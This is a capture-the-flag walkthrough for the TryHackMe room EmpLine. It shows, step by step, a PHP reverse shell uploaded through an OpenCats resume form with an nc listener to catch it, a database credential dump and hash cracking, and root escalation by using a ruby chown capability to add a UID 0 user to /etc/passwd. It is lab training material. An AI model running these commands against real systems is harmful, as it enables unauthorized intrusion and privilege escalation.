EmpLine is a free TryHackMe room created by zyeinn, this room is a free room which means anyone can connect and start hacking on it.
There really wasn’t a big write up on the room, basically deploy the machine and submit the user.txt and the root.txt.
Lets start with a basic nmap scan and seee what we can find.
nmap -sS -T4 -sV -sC $ip
From the nmapscan above we can see that we are listening on 22/SSH, 80/HTTP and 3306/MySQL (running MariaDB).
So first lets take a look at the web page on port TCP port 80.
After a bit of browsing on the site we can see that the EMPLOYMENT link points to a virtual host of job.empline.thm/careers so we will need to add this to our /etc/hosts file if we want to browse to it.
10.10.10.10 job.empline.thm empline.thmGoing to the careers page we find a link for current open positions that we can follow.
Which then leads us to a job opening we can apply for by clicking on the Mobile Dev Link.
This page allows us to apply for the job by submitting our resume. Lets see if we can submit a php reverse shell. We can use the php-reverse-shell.php from pentestmonkey. This file is also available on the TryHackMe attack box as shown below.
cp /usr/share/webshells/php/php-reverse-shell.php ./
vi php-reverse-shell.phpNow we just need to update the $ip and $port variable in the script to point back to our attack box.
Now we upload the modified php-reverse-shell.php to the webpage.
Start a listener on our attack box via nc -lnvp 666 as shown below.
Now we need to execute the php-reverse-shell.php file we uploaded. Looking at the OpenCats open source project on github we can see where these files are uploaded to.
Now we just need to browse to that directory on the server and see if we can execute our php-reverse-shell.php.
Perfect, we have access to the directory and can see our php-reverse-shell.php file.
With our nc listener running we can click on the link and catch our reverse shell.
We can see that we are running as www-data and have simple shell that we we will upgrade via python.
First we start a full interactive shell with python via python3 -c 'import pty;pty.spawn("/bin/bash")'. In order to make this shell usable we will need to background it with ctrl-z and they type stty raw -echo && fg and then press enter. For a better explanation you can read about the process on ropnops blog.
After inspecting the config.php at /var/www/opencats we can find some database credentials.
Using these credentials we should be able to connect to the database instance on port 3306 we found in our nmap scan at the beginning.
mysql -uusername -p -h10.10.10.10
-u is username (if the name was bob you would use -ubob)
-p denotes that you will be prompted for the password
-h specifies that you will connect to a remote DB at this IP address
After some poking around we can find the password hashes for 3 accounts in the database.
After copying the hashes to a file we can use john the ripper to attempt to crack them.
Now that we have a username and password set we may be able to connect to the box via ssh.
Success! We have the user.txt flag.
After a bit of poking around I could find an easy way to escalate to root, so I decided to upload linpeas.sh and see what it could find on the box.
scp $(locate linpeas.sh) usernameyoufound@10.10.103.182:./
Once linpeas.sh is on the box we have to change it to be executable and run it. This can be accomplished by chmod +x linpeas.sh && ./linpeas.sh
Once completed we can see that additional capabilities have been given to the /usr/local/bin/ruby executable allowing it to change ownership of files.
In the screenshot below I can see that /etc/passwd is currently owned by root. But if I call ruby and perform a chown method on the /etc/passwd file I should be able to make my user account the owner
ruby -e 'File.chown(1002,1002,"/etc/passwd")'Now that we are the owners of /etc/passwd we can edit the file and add in a new account with root privileges.
First we need a unsalted password we can create with mkpasswd on our attack box.
If we add in a new user at the bottom of the /etc/passwd file and use the password we created above all we need to do is give the UID:GID a value of 0 and that account will be a root user.
Once we save /etc/passwd with the new account that has a UID and GID of zero we can just switch user with the su — command.
And we have the root.txt proof.
Thank you to zyeinn for such a fun room to play around in!
